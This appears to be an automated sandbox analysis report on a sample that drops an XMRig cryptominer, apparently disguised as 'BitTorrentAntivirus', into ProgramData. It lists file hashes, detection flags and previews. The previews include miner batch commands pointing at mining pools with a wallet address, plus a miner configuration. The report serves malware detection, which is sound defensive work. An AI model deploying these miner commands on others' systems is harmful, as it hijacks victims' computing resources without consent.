Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER544F.tmp.xml

Download File

Process:	C:\Windows\System32\wermgr.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4310
Entropy (8bit):	4.428103815301895
Encrypted:	false
SSDEEP:	48:cvIwSD8zsCJgtBI9j7Wgc8sqYjj8fm8M4JFKfY2xAFpfyq8veY2xaghO8O6d:uITfQNKgrsqYcJFKf/UWe/9k8O6d
MD5:	6B50A931CE2D9ECB2A9A02DACDF46B06
SHA1:	6F93CC68AE940A4D83B37B0360D1E78FA32D526C
SHA-256:	E177BC8A1DCEA7EAE4874AA63D3E81411EE203ED059783393E00C13A2BD54180
SHA-512:	20A4709294301D1C89C8849841FE01D0C09D0A704928FE8DA2235A49ABB9AE8E2DD1043C1844E462D5498DDA7426483D721BC48D4305003897F9D0C39E258547
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2032951" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER65A4.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	76862
Entropy (8bit):	3.0963786711465695
Encrypted:	false
SSDEEP:	768:8NHaTO1wHtEz+2LBBfsT005s/C0APL7C6QV0:8NHYO16JEBBfsT005sq0APL7C6QV0
MD5:	419C2AA00F19388B8EF752412A61F88C
SHA1:	33CE4163DAE199067C2DB9B8229B31BFF670C895
SHA-256:	070D09738A5DE7681E6D90C9FAB3926420603626C2AAB20383BCB2D0F37A1DF0
SHA-512:	C699E5E154932010C62F0B0DF6EDAC603DC8C09389BA9C47E789548693E807B268E0DEF6F4361E817E5816D0E8F9B22949FEC30D9E66D5A9AAFC67F3EE6747DD
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER983E.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.700874659851341
Encrypted:	false
SSDEEP:	96:kiZYWr+QxEsCYsYkWOHYUYEZWEt8iJKXhM7wQqE6Pa1vH/c+XsyIaSL:hZDgbbqPFa1vH/c+kaSL
MD5:	BCEC547572A81D9791FAFA120CF58EC4
SHA1:	9621DA607B980B3BCA86DED4026BE8258F66A424
SHA-256:	1DF73C2BD5E0CD9FF4A9376E29515512C8C9D3853A857E721C8B4D2149532FB8
SHA-512:	66A0184A8D29063911BD1415890EE7822647B0C17FE8406C459C06C9BA1BAFBCBFBC63511465A7730B5807F8E1132B74F451BA433EAA0308C6D412F0E3F0D9E9
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.2.6.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\SHA256SUMS

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	748
Entropy (8bit):	4.675550908201553
Encrypted:	false
SSDEEP:	12:luxgnyLrjZPHd3sGsBLa+0bafh+ATPl6zGafCvFeJGwWMA8sz8Cu24oj4YsQn79:KgnMrlPHdXgLvk+k+mGaKvFu3Wxz9p4q
MD5:	2C2864217325DD225D1FF1AC119467F9
SHA1:	4761D70353C90E799289D336556E33DE50873DE2
SHA-256:	8782FC27AAA7162F0E44BB81030A163A0103FEAAFED789A2DEE75152A6CDB5B5
SHA-512:	B21FAE5B76DC61B9C4456BFF0BF42016A7310DFF67E7F280FFD4EF2B2DE55F17EDCCF4135DCFD4CA1595DC4BD2E2763723351F3BE71340FFA7E52BE63408EA96
Malicious:	false
Preview:	11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 WinRing0x64.sys.bdec0d2ea20decc25659f26c7bfd7a78fb0e51cc100443b8a35c43206d2eb86a benchmark_10M.cmd.8d26568f8d874053ad68dd1f4510a85ae61045e0945c33599dabd461fae7e835 benchmark_1M.cmd.2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec config.json.02ed7c9449e9f7c92709edc9e687e66c0e5ab012196eb90ef5071a2d698af62e pool_mine_example.cmd.bfcef8b9791893a58f4a999190e83d8426a6d1be6b7ee9ccd8bd06f5e55d314d rtm_ghostrider_example.cmd.6e87f8c30fe0ef0035227ed01d3824223b72c9a196bdcd3202bb0a533d0ea804 solo_mine_example.cmd.9554e811347798d784bbe0ed5fa212e95dc8783a34cbc298454805f0988cb577 start.cmd.f5b6a7f841ea8a07e15d6f3e946025149a85b330b0b5a05b75ddfc95739f11f7 *xmrig.exe.

C:\ProgramData\WinRing0x64.sys

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 2%, Browse
Joe Sandbox View:	Filename: 9zi15Ni7Wg.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: NBLe3nmUpT.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: updater.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: ex6KGPBGCC.exe, Detection: malicious, Browse Filename: AjYB11aBv7.exe, Detection: malicious, Browse Filename: setup.EXE.exe, Detection: malicious, Browse Filename: 7aqYJ5Mnxz.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: V1lIaJpTZP.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: DEVMI.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\ProgramData\benchmark_10M.cmd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.657988351046885
Encrypted:	false
SSDEEP:	3:mKDDrVyXQdAyIgytoyrIJnn:h3IXQfrsoD
MD5:	14B1CE42DED2DF03638180864E4D056F
SHA1:	CBC1B3EDD1942630F6363F3CCAE574283B14C260
SHA-256:	BDEC0D2EA20DECC25659F26C7BFD7A78FB0E51CC100443B8A35C43206D2EB86A
SHA-512:	D8297C2728245B570AD71B8062A17E28E2D9E72BF8BE773BB92828E57912CDD0A6EC35FE244069A5FDAF3BE8CFE3997C403EA551B81BE5708DD80C6EB5F6E458
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off.cd %~dp0.xmrig.exe --bench=10M --submit.pause.

C:\ProgramData\benchmark_1M.cmd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.647459204859199
Encrypted:	false
SSDEEP:	3:mKDDrVyXQdAyIgydsJnn:h3IXQfrZ
MD5:	4CC3AB4B68DC35959E289F4C7562E909
SHA1:	C88098544439D41013EAAA7E31D2ED68DDD9C874
SHA-256:	8D26568F8D874053AD68DD1F4510A85AE61045E0945C33599DABD461FAE7E835
SHA-512:	858F12AC880D4B794110AC21CA77A56933A781383A435A23B2E58D3925208F712424E691F90B1EE8A8F5C459C19969EF39A609AC4DDBCC5F4D98ED4DC1F17BB5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off.cd %~dp0.xmrig.exe --bench=1M --submit.pause.

C:\ProgramData\config.json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2947
Entropy (8bit):	4.004486451227241
Encrypted:	false
SSDEEP:	48:CtWTHcfLWHW8b9b2lZ9lCfnT1L8njzL6fM9ELDELfoBazQtw4KD5r:CtWTGyHpT1L8njzL6fnLQL0acWDp
MD5:	0276C6324AABC2FE43E316E6BA9D32FA
SHA1:	623BD1F6CF9CA5BD84FBDCAAE4C6875FB4FA4E26
SHA-256:	2D8013F723A72B1A8D62DA03DD58D10228A8F57354672F1465B86DD7A4B60EE1
SHA-512:	48556728D9DA80DC4E60B710B316CDA8143AED100BBDF812941ACBE35E1CC35926998236262F14602BE22ACCDF28B06A81E0B7FF287687605409DDB4B601B5FA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\config.json, Author: Joe Security
Preview:	{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "asm": true,. "argon2-impl": null,. "argon2": [0, 1],. "cn": [. [1, 0],. [1, 1]. ],. "cn-heavy": [. [1, 0],. [1, 1]. ],. "cn-lite": [.

C:\ProgramData\pool_mine_example.cmd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.932931503835712
Encrypted:	false
SSDEEP:	24:knECAL1ACWm4Vw5fP5t59XMaoGaK8IZAR0x+FcU71Mtzkz7CQhvvuIA5B4V+XD/M:8ErG58pPS5GapIWG+Fcc1Vz7LhvvwSVJ
MD5:	E7E82CA383D5C8DB7D12F5770D04E2A3
SHA1:	8E0F5111F4E0D95A606A0A434A03F15D6C118B04
SHA-256:	02ED7C9449E9F7C92709EDC9E687E66C0E5AB012196EB90EF5071A2D698AF62E
SHA-512:	40B14ADAB0F0D1374001E5D754F97E902C448190C3580B3A028F0CA1C16E52BC625292E85EE90A652DADDA689C83877269962935B5D7382186C84A0DF2FA50B8
Malicious:	false
Yara Hits:	Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\ProgramData\pool_mine_example.cmd, Author: Florian Roth (Nextron Systems)
Preview:	:: Example batch file for mining Monero at a pool.::.:: Format:.::.xmrig.exe -o <pool address>:<pool port> -u <pool username/wallet> -p <pool password>.::.:: Fields:.::.pool address..The host name of the pool stratum or its IP address, for example pool.hashvault.pro.::.pool port ..The port of the pool's stratum to connect to, for example 3333. Check your pool's getting started page..::.pool username/wallet .For most pools, this is the wallet address you want to mine to. Some pools require a username.::.pool password ..For most pools this can be just 'x'. For pools using usernames, you may need to provide a password as configured on the pool..::.:: List of Monero mining pools:.::.https://miningpoolstats.stream/monero.::.:: Choose pools outside of top 5 to help Monero network be more decentralized!.:: Smaller pools also often have smaller fees/payout limits...cd %~dp0.xmrig.exe -o pool.hashvault.pro:3333 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4f

C:\ProgramData\rtm_ghostrider_example.cmd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1215
Entropy (8bit):	4.563974122788005
Encrypted:	false
SSDEEP:	24:knTXzrL1ACvs4VYt5ONwvoGsPZAR0x+FcVtUtzH37CQhvv6I5E9c6I5E/Ywke:8T3G4HWPnwGsPWG+FcVK7Lhvv6OMOoNt
MD5:	9B7762432E3AB03DC49B1989EC7B8D1C
SHA1:	AC7F0DF988B00F665E29C6204866D8BA4CC18B5F
SHA-256:	BFCEF8B9791893A58F4A999190E83D8426A6D1BE6B7EE9CCD8BD06F5E55D314D
SHA-512:	920F6C7CB3F95C82EC7A97314166C7A7165EE4D6D658C70D64F6528515DD7B10E9D0C28F91FA958B47663D854FA8037EC2CA8368E7D550F5F2C49A16504FFA88
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	:: Example batch file for mining Raptoreum at a pool.::.:: Format:.:: xmrig.exe -a gr -o <pool address>:<pool port> -u <pool username/wallet> -p <pool password>.::.:: Fields:.:: pool address The host name of the pool stratum or its IP address, for example raptoreumemporium.com.:: pool port The port of the pool's stratum to connect to, for example 3333. Check your pool's getting started page..:: pool username/wallet For most pools, this is the wallet address you want to mine to. Some pools require a username.:: pool password For most pools this can be just 'x'. For pools using usernames, you may need to provide a password as configured on the pool..::.:: List of Raptoreum mining pools:.:: https://miningpoolstats.stream/raptoreum.::.:: Choose pools outside of top 5 to help Raptoreum network be more decentralized!.:: Smaller pools also often have smaller fees/payout limits...cd %~dp0.:: Use this command line to connect to

C:\ProgramData\solo_mine_example.cmd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	815
Entropy (8bit):	5.079567827157984
Encrypted:	false
SSDEEP:	24:knTC6jGoTcC6gaO8oAZvfa6Tz7nR7O+ORxxI/V+XD/X:8TdNAzOr0a6Tz7nR7OhCVwX
MD5:	9A6E73E55C32BB8DB34E599A8AE176A3
SHA1:	BF4B8811A649529FD821FDEE9236622CD1D4AD3D
SHA-256:	6E87F8C30FE0EF0035227ED01D3824223B72C9A196BDCD3202BB0A533D0EA804
SHA-512:	AEFCA1B39751DD5CAF3050C8E2DBE0A53AC2D0D14D9178AE10E7B33AF256A30FC7522884C1AD5FCFCA83FD18AED5BD05C350BBB103BF597AC00FE33B220A53B0
Malicious:	false
Preview:	:: Example batch file for mining Monero solo.::.:: Format:.::.xmrig.exe -o <node address>:<node port> -a rx/0 -u <wallet address> --daemon.::.:: Fields:.::.node address..The host name of your monerod node or its IP address. It can also be a public node with RPC enabled, for example node.xmr.to.::.node port ..The RPC port of your monerod node to connect to, usually 18081..::.wallet address..Check your Monero CLI or GUI wallet to see your wallet's address..::.:: Mining solo is the best way to help Monero network be more decentralized!.:: But you will only get a payout when you find a block which can take more than a year for a single low-end PC...cd %~dp0.xmrig.exe -o node.xmr.to:18081 -a rx/0 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD --daemon.pause.

C:\ProgramData\start.cmd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	43
Entropy (8bit):	4.306753929413316
Encrypted:	false
SSDEEP:	3:mKDD0j7LqAAUoWQIv:hgjPW1Iv
MD5:	23A35F34A3672FFA81C3EE80291E03F3
SHA1:	8AE5285601B5AF1630383C51E4079D6EF872EA78
SHA-256:	E534866154CE50C0534BA05F1DB77AAF2975F4804E48C133F7082B260C8081B6
SHA-512:	13D9EA203F5AC67DDFF55A72A4E3D497DD29E92AD2985B7F0599A3E531E00FADFFB0BE787F1C981A22C6451D7AF4FC1EFF3A1CCC5118FB139B6635ED2D942823
Malicious:	false
Preview:	@echo off..BitTorrentAntivirus.exe..pause..

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10982434425477877
Encrypted:	false
SSDEEP:	12:26+lUXm/Ey6q999583Kq3qQ10nMCldimE8eawHjcol6:26el68a3PLyMCldzE9BHjcT
MD5:	B60B727D69889EBEFA00BC45C14B3EE5
SHA1:	D04D12C1CA843AED6B79FAD3B9DE30347A7438C2
SHA-256:	8773D72506E11C2E9AADA24BAC3EC2C0FC220EF97807D96761A00C750EEFD190
SHA-512:	0D75DAD4064365B4C8F7A515C8E53C5063B1D42835C7FFC1C7F033EA709E7A4C30F17DA5A140E77B573A28D80123CB20E9DA52771276DB5E57C45C20CFC97322
Malicious:	false
Preview:	................................................................................@...x....D.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.1..... .....}D:nW...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.@...x....N......................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11258625240537898
Encrypted:	false
SSDEEP:	12:ql8Xm/Ey6q999583yG1miM3qQ10nMCldimE8eawHza1miI5lNd:yl68a3yG1tMLyMCldzE9BHza1tIr
MD5:	2DE333F5CAFD42BDC78AC280A0B1C5BC
SHA1:	53944F4C7C44181041047CF4284EEA8C23ECD64F
SHA-256:	D4AFCC41462824C902F6D81A81385EBF84C2E774D06AEF9A81BF674CEF3970A3
SHA-512:	A5EB243F40147E7385DB83375098A57DC22D8A4DF7DDEA369837C0D714D566476958D4827B391E865CBF6851EC64C33A8EED15F67272F86088C83D344E05A13D
Malicious:	false
Preview:	................................................................................@...x....+.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.1..... .......+nW...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.@...x....5......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11249306322602246
Encrypted:	false
SSDEEP:	12:qlmXm/Ey6q999583m1mK2P3qQ10nMCldimE8eawHza1mKil8d:gl68a3m1iPLyMCldzE9BHza1H
MD5:	E31A41EF7033CE32F4D868246A5F9DD7
SHA1:	EA6A1B01F59B5EA48DAE0E12B1BC5CFBEE642D53
SHA-256:	B773DC35986FD49C5C9F0ECEAD2940C128343F22B20006FADAF173308FEAF681
SHA-512:	21C0E0118BD080B274FF5B047FB3F38B57A7D57CD78C9CE0099A98285E75781CD1A773CCD9AC2597B0D8C56A32623B685A4E7EBC790BF93825E7A05EBFF01853
Malicious:	false
Preview:	................................................................................@...x............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.1..... ........mW...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.@...x... .......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10982434425477877
Encrypted:	false
SSDEEP:	12:26+lUXm/Ey6q999583Kq3qQ10nMCldimE8eawHjcol6:26el68a3PLyMCldzE9BHjcT
MD5:	B60B727D69889EBEFA00BC45C14B3EE5
SHA1:	D04D12C1CA843AED6B79FAD3B9DE30347A7438C2
SHA-256:	8773D72506E11C2E9AADA24BAC3EC2C0FC220EF97807D96761A00C750EEFD190
SHA-512:	0D75DAD4064365B4C8F7A515C8E53C5063B1D42835C7FFC1C7F033EA709E7A4C30F17DA5A140E77B573A28D80123CB20E9DA52771276DB5E57C45C20CFC97322
Malicious:	false
Preview:	................................................................................@...x....D.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.1..... .....}D:nW...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.@...x....N......................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11258625240537898
Encrypted:	false
SSDEEP:	12:ql8Xm/Ey6q999583yG1miM3qQ10nMCldimE8eawHza1miI5lNd:yl68a3yG1tMLyMCldzE9BHza1tIr
MD5:	2DE333F5CAFD42BDC78AC280A0B1C5BC
SHA1:	53944F4C7C44181041047CF4284EEA8C23ECD64F
SHA-256:	D4AFCC41462824C902F6D81A81385EBF84C2E774D06AEF9A81BF674CEF3970A3
SHA-512:	A5EB243F40147E7385DB83375098A57DC22D8A4DF7DDEA369837C0D714D566476958D4827B391E865CBF6851EC64C33A8EED15F67272F86088C83D344E05A13D
Malicious:	false
Preview:	................................................................................@...x....+.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.1..... .......+nW...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.@...x....5......................................................................................................................................................................................................................................................................................................................................................................................

